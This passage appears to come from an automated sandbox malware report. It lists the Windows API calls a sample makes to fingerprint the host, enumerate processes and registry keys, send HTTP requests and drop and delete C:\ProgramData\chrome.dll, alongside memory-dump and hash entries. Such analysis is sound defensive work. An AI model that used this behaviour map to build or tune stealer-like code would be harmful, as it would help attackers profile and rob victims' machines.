                                                                                                  • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                  • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                  • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                  • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                  • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                  • Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                                                                                  • Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                                                                                  • Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                                                                                  • Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83
                                                                                                  • Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                                                                                  • Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                                                                                  • Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                                                                                  • Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5
                                                                                                  • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                                                                                  • Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                                                                                  • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                                                                                  • Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                                                                                  • Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2
                                                                                                  • Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D
                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,009746C0,00000000,?,00420E0C,00000000,?,00000000,00000000,?,00974098,00000000,?,00420E08,00000000), ref: 004122CE
                                                                                                  • Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                                                                                  • Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                                                                                  • Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F
                                                                                                  • Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                                                                                  • Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                                                                                  • Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,0096E590,00000000,00020119,?), ref: 00417FEE
                                                                                                  • Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,00974360,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                                                                                  • Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022
                                                                                                  • Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
                                                                                                  • Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168
                                                                                                  • Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
                                                                                                  • Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6
                                                                                                  • Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                                                                                  • Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                                                                                  • Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                                                                                  • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
                                                                                                  • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
                                                                                                  • Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C
                                                                                                  • Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                                                                                  • Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                                                                                  • Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0
                                                                                                  • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,0096F1F8,00000000,00020019,00000000,004205BE), ref: 00418534
                                                                                                  • Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                  • Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
                                                                                                  • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                  • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                  • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                  • Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                                                                                  • Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
                                                                                                  • Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                                                                  • Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                                • String ID: aA
                                                                                                • API String ID: 2204142833-2414573348
                                                                                                • Opcode ID: 20d0b609ef32cf42b6c6fc92dfc40e1c6d6336cdf5d7838363857d2f256b376a
                                                                                                • Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
                                                                                                • Opcode Fuzzy Hash: 20d0b609ef32cf42b6c6fc92dfc40e1c6d6336cdf5d7838363857d2f256b376a
                                                                                                • Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69
                                                                                                APIs
                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                                                                                • Sleep.KERNEL32(00001770), ref: 00416DA4
                                                                                                • CloseHandle.KERNEL32(?,00000000,?,0096C238,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                                                                                • ExitProcess.KERNEL32 ref: 00416DC2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                • String ID:
                                                                                                • API String ID: 941982115-0
                                                                                                • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                                                                                • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                                                                                • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                                                                                • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID: exclusive$winOpen
                                                                                                • API String ID: 823142352-1568912604
                                                                                                • Opcode ID: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
                                                                                                • Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
                                                                                                • Opcode Fuzzy Hash: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
                                                                                                • Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                  • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00976668), ref: 00406353
                                                                                                  • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                  • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                  • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                  • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                                • String ID: ERROR$ERROR
                                                                                                • API String ID: 3287882509-2579291623
                                                                                                • Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                                                                                • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                                                                                • Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                                                                                • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                                                                                APIs
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                                                                                • lstrcatA.KERNEL32(?,00975F48), ref: 004152F8
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                  • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                • String ID: 9dA
                                                                                                • API String ID: 2699682494-3568425128
                                                                                                • Opcode ID: b3c7eb08bdb27c17df0a595ad6a35b21054426e05c9e3aa312843089f6760e13
                                                                                                • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                                                                                • Opcode Fuzzy Hash: b3c7eb08bdb27c17df0a595ad6a35b21054426e05c9e3aa312843089f6760e13
                                                                                                • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                                                                                APIs
                                                                                                • StrCmpCA.SHLWAPI(00000000,0096C408), ref: 00410922
                                                                                                • StrCmpCA.SHLWAPI(00000000,0096C3F8), ref: 00410B79
                                                                                                • StrCmpCA.SHLWAPI(00000000,0096C418), ref: 00410A0C
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFilelstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 273707478-0
                                                                                                • Opcode ID: 350fdc06db04c550adeb669f8e4f57cb64e705fbcd002e2c70181c845b731ff4
                                                                                                • Instruction ID: 55ebfe5bea072269aba33a565d8c59cbe62f1375a0798b8cb4aa3666f491b8e5
                                                                                                • Opcode Fuzzy Hash: 350fdc06db04c550adeb669f8e4f57cb64e705fbcd002e2c70181c845b731ff4
                                                                                                • Instruction Fuzzy Hash: EA916471B001089FCB18EF65DA95EED77B6EF94304F10816EE40A9F391DB349A49CB86
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                                                                • WriteFile.KERNEL32(000000FF,004108DC,?,004108DC,00000000,?,004108DC), ref: 004198A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateWrite
                                                                                                • String ID:
                                                                                                • API String ID: 2263783195-0
                                                                                                • Opcode ID: 87033afd89575812e055b209c04b4c4260860767bd957b8fe466ea0b568eb40e
                                                                                                • Instruction ID: c00870ae4f46cd9ec0fbaadc8d13ab59566e93f84a6b66ec8604c729da6f8a20
                                                                                                • Opcode Fuzzy Hash: 87033afd89575812e055b209c04b4c4260860767bd957b8fe466ea0b568eb40e
                                                                                                • Instruction Fuzzy Hash: BE11C830A08248BBDB10EFA0DC15BDE7B795F05314F044199F655A72C1DB346B45C7DA
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocComputerNameProcess
                                                                                                • String ID:
                                                                                                • API String ID: 4203777966-0
                                                                                                • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                                                                                • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                                                                                • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                                                                                • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041963F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
